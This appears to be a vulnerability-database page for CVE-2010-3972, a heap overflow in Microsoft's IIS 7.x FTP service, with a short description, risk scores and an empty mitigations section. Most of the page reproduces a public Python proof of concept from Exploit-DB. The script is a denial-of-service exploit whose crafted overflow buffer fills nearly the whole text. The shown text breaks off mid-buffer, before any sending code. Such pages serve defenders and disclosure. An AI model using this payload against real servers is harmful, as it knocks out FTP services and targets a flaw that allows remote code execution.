VIR Vulnerability Intelligence Relay

CVE-2010-3972

critical
Published 2010-12-23 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Heap-based buffer overflow in the TELNET_STREAM_CONTEXT::OnSendData function in ftpsvc.dll in Microsoft FTP Service 7.0 and 7.5 for Internet Information Services (IIS) 7.0, and IIS 7.5, allows remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via a crafted FTP command, aka "IIS FTP Service Heap Buffer Overrun Vulnerability." NOTE: some of these details are obtained from third party information.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-15803 dos windows verified python ยท 26 KB
Matthew Bergin ยท 2010-12-21

Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC)

python exploit Source: Exploit-DB 
	
import socket, sys
print "\n" 
print "----------------------------------------------------------------"
print "|      Windows 7 IIS7.5 FTPSVC UNAUTH'D REMOTE DOS POC          |"
print "|      Matthew Bergin, Bergin Penetration Testing               |"
print "|       Win7 Ultimate v6.1 build 7600, IIS 7.5.7600.16385                     |"
print "----------------------------------------------------------------"
print "\n"
buf=("\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef"
"\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83"
"\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0\xef\x83\xb0"
"\xef\x83\xb0\xef\x83\xb0\x31\x34\x34\x39\x38\xef\xbb\xbf\xff\xef"
"\xfe\xff\xff\xef\xff\xef\xff\xef\xef\xbb\xbf\xfe\xff\xff\xef\xef"
"\xbb\xbf\xfe\xff\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff"
"\xef\xff\xef\xff\xef\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef\xef\xbb"
"\xbf\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xfe\xff"
"\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xff\xef\xff\xef\xfe\xff"
"\xff\xef\xfe\xff\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xff\xef\xff"
"\xef\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xff\xef"
"\xfe\xff\xff\xef\xff\xef\xff\xef\xff\xef\xef\xbb\xbf\xfe\xff\xef"
"\xbb\xbf\xef\xbb\xbf\xff\xef\xff\xef\xff\xef\xff\xef\xff\xef\xfe"
"\xff\xfe\xff\xfe\xff\xfe\xff\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff"
"\xef\xff\xef\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef"
"\xef\xbb\xbf\xfe\xff\xfe\xff\xff\xef\xff\xef\xfe\xff\xfe\xff\xef"
"\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xff\xef"
"\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xff\xef"
"\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb"
"\xbf\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xff\xef"
"\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb\xbf\xfe"
"\xff\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xfe"
"\xff\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xfe\xff"
"\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xff\xef\xfe\xff\xff\xef"
"\xff\xef\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb"
"\xbf\xef\xbb\xbf\xff\xef\xff\xef\xfe\xff\xfe\xff\xef\xbb\xbf\xff"
"\xef\xfe\xff\xfe\xff\xff\xef\xef\xbb\xbf\xfe\xff\xfe\xff\xef\xbb"
"\xbf\xff\xef\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xfe\xff\xef"
"\xbb\xbf\xfe\xff\xff\xef\xfe\xff\xff\xef\xfe\xff\xfe\xff\xef\xbb"
"\xbf\xff\xef\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef"
"\xbb\xbf\xff\xef\xfe\xff\xff\xef\xff\xef\xfe\xff\xfe\xff\xfe\xff"
"\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xfe"
"\xff\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb"
"\xbf\xef\xbb\xbf\xfe\xff\xfe\xff\xff\xef\xef\xbb\xbf\xff\xef\xff"
"\xef\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef\xbb"
"\xbf\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xef\xbb\xbf"
"\xef\xbb\xbf\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef"
"\xbb\xbf\xfe\xff\xff\xef\xfe\xff\xff\xef\xef\xbb\xbf\xfe\xff\xff"
"\xef\xff\xef\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef\xbb\xbf"
"\xff\xef\xfe\xff\xfe\xff\xff\xef\xff\xef\xfe\xff\xef\xbb\xbf\xff"
"\xef\xff\xef\xff\xef\xff\xef\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xfe"
"\xff\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xfe\xff"
"\xef\xbb\xbf\xff\xef\xff\xef\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef"
"\xbb\xbf\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef"
"\xff\xef\xfe\xff\xfe\xff\xff\xef\xff\xef\xef\xbb\xbf\xfe\xff\xff"
"\xef\xef\xbb\xbf"
"\xff\xef\xff\xef\xff\xef\xfe\xff\xfe\xff\xef\xbb\xbf\xff\xef\xef"
"\xbb\xbf\xff\xef\xef\xbb\xbf\xff\xef\xfe\xff\xff\xef\xef\xbb\xbf"
"\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xff\xef\xfe\xff"
"\xfe\xff\xff\xef\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef"
"\xbb\xbf\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb\xbf\xfe\xff\xff\xef"
"\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xfe\xff"
"\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef\xff\xef\xfe\xff\xff"
"\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xff"
"\xef\xff\xef\xef\xbb\xbf\xfe\xff\xfe\xff\xff\xef\xff\xef\xff\xef"
"\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xff\xef\xfe\xff\xff\xef"
"\xff\xef\xfe\xff\xff\xef\xfe\xff\xfe\xff\xfe\xff\xff\xef\xfe\xff"
"\xfe\xff\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb"
"\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef\xff\xef\xef\xbb\xbf\xff"
"\xef\xfe\xff\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xff\xef"
"\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xff\xef"
"\xff\xef\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xfe\xff\xfe\xff\xef\xbb"
"\xbf\xfe\xff\xfe\xff\xfe\xff\xfe\xff\xff\xef\xef\xbb\xbf\xef\xbb"
"\xbf\xff\xef\xfe\xff\xfe\xff\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef"
"\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xff\xef\xff\xef\xfe\xff"
"\xff\xef\xfe\xff\xef\xbb\xbf\xfe\xff\xfe\xff\xfe\xff\xef\xbb\xbf"
"\xff\xef\xff\xef\xef\xbb\xbf\xff\xef\xff\xef\xfe\xff\xff\xef\xfe"
"\xff\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef"
"\xbb\xbf\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xff\xef\xff\xef\xfe\xff"
"\xff\xef\xfe\xff\xfe\xff\xfe\xff\xfe\xff\xfe\xff\xef\xbb\xbf\xfe"
"\xff\xfe\xff\xfe\xff\xef\xbb\xbf\xfe\xff\xff\xef\xff\xef\xef\xbb"
"\xbf\xfe\xff\xfe\xff\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xff"
"\xef\xff\xef\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff\xef\xff\xef\xfe"
"\xff\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xff"
"\xef\xff\xef\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf"
"\xfe\xff\xff\xef\xfe\xff\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xfe"
"\xff\xff\xef\xef\xbb\xbf\xff\xef\xff\xef\xfe\xff\xfe\xff\xfe\xff"
"\xff\xef\xff\xef\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xff\xef"
"\xfe\xff\xff\xef\xfe\xff\xff\xef\xfe\xff\xfe\xff\xfe\xff\xff\xef"
"\xfe\xff\xff\xef\xfe\xff\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef"
"\xff\xef\xff\xef\xfe\xff\xff\xef\xfe\xff\xfe\xff\xff\xef\xfe\xff"
"\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xef\xbb\xbf"
"\xff\xef\xef\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xfe\xff\xef\xbb\xbf"
"\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xff\xef\xfe"
"\xff\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff\xef\xfe\xff"
"\xff\xef\xfe\xff\xff\xef\xfe\xff\xfe\xff\xff\xef\xef\xbb\xbf\xef"
"\xbb\xbf\xfe\xff\xff\xef\xef\xbb\xbf\xfe\xff\xfe\xff\xfe\xff\xfe"
"\xff\xfe\xff\xff\xef\xff\xef\xff\xef\xfe\xff\xfe\xff\xef\xbb\xbf"
"\xff\xef\xfe\xff\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf"
"\xff\xef\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xff\xef\xff\xef"
"\xef\xbb\xbf\xff\xef\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb"
"\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf"
"\xfe\xff\xef\xbb\xbf\xff\xef\xff\xef\xfe\xff\xff\xef\xef\xbb\xbf"
"\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xff\xef\xef\xbb"
"\xbf\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb\xbf\xfe\xff\xfe\xff\xfe"
"\xff\xef\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xff\xef\xef\xbb\xbf\xef"
"\xbb\xbf\xff\xef\xfe\xff\xff\xef\xff\xef\xff\xef\xff\xef\xef\xbb"
"\xbf\xff\xef\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef"
"\xef\xbb\xbf\xfe\xff\xff\xef\xff\xef\xff\xef\xef\xbb\xbf\xef\xbb"
"\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xef"
"\xbb\xbf\xfe\xff\xfe\xff\xfe\xff\xff\xef\xef\xbb\xbf\xfe\xff\xef"
"\xbb\xbf\xfe\xff\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef\xbb"
"\xbf\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb"
"\xbf\xfe\xff\xff\xef\xff\xef\xfe\xff\xfe\xff\xfe\xff\xfe\xff\xef"
"\xbb\xbf\xff\xef\xff\xef\xfe\xff\xff\xef\xef\xbb\xbf\xef\xbb\xbf"
"\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff"
"\xef\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xef\xbb"
"\xbf\xff\xef\xef\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xff\xef\xff\xef"
"\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xff\xef\xff\xef\xfe\xff\xef\xbb"
"\xbf\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef\xbb"
"\xbf\xff\xef\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xfe\xff\xff\xef\xfe"
